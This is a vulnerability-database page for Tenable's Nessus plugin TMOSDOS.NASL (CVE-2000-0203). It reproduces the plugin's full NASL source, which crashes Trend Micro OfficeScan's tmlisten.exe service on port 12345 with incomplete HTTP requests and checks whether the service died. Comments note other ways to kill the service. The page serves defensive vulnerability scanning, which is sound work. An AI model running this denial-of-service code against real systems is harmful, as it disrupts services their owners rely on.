Lucene search

K
nessusThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.TMOSDOS.NASL
HistoryAug 03, 2002 - 12:00 a.m.

Trend Micro OfficeScan tmlisten.exe Malformed Data Remote DoS

2002-08-0300:00:00
This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
www.tenable.com
59

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

EPSS

0.009

Percentile

83.1%

It was possible to kill the Trend Micro OfficeScan antivirus management service by sending an incomplete HTTP request.

#
# (C) Tenable Network Security, Inc.
#

# Script audit and contributions from Carmichael Security
#      Erik Anderson <[email protected]> (nb: domain no longer exists)
#      Added BugtraqID and CVE
#
# Status: untested
#
# TBD:
# Sending garbage may also kill the service or make it eat 100% CPU
# Opening 5 connections while sending garbage will kill it



include("compat.inc");

if(description)
{
 script_id(11059);
 script_version("1.27");
 script_cve_id("CVE-2000-0203");
 script_bugtraq_id(1013);

 script_name(english:"Trend Micro OfficeScan tmlisten.exe Malformed Data Remote DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote host has an application that is affected by a 
denial of service vulnerability." );
 script_set_attribute(attribute:"description", value:
"It was possible to kill the Trend Micro OfficeScan 
antivirus management service by sending an incomplete 
HTTP request." );
 script_set_attribute(attribute:"solution", value:
"upgrade your software" );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2002/08/03");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/02/25");
 script_cvs_date("Date: 2018/08/01 17:36:15");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english: "Crashes OfficeScan");
 script_category(ACT_DENIAL);
 script_copyright(english: "This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english: "Windows");
 script_dependencies("find_service1.nasl");
 script_require_ports("Services/www", 12345);
 exit(0);
}

# The script code starts here

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

function check(port)
{
 local_var  attack, r, n, soc, attacks_l;

 if (http_is_dead(port: port)) return (0);

 n = 0;
 foreach attack (attacks_l)
 {
  soc = http_open_socket(port);
  if (! soc)
   sleep(1);
  else
  {
   send(socket:soc, data: attack);
   r = http_recv3(socket:soc);
   http_close_socket(soc);
   n++;
  }
 }
 if (! n) return 0;
 if (http_is_dead(port: port, retry: 3)) security_warning(port);
}

 # get or GET?
 attacks_l = make_list('get /  \r\n', 'GET /  \r\n');

ports = add_port_in_list(list:get_kb_list("Services/www"), port:12345);
foreach port (ports)
 check(port:port);

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

EPSS

0.009

Percentile

83.1%

Related for TMOSDOS.NASL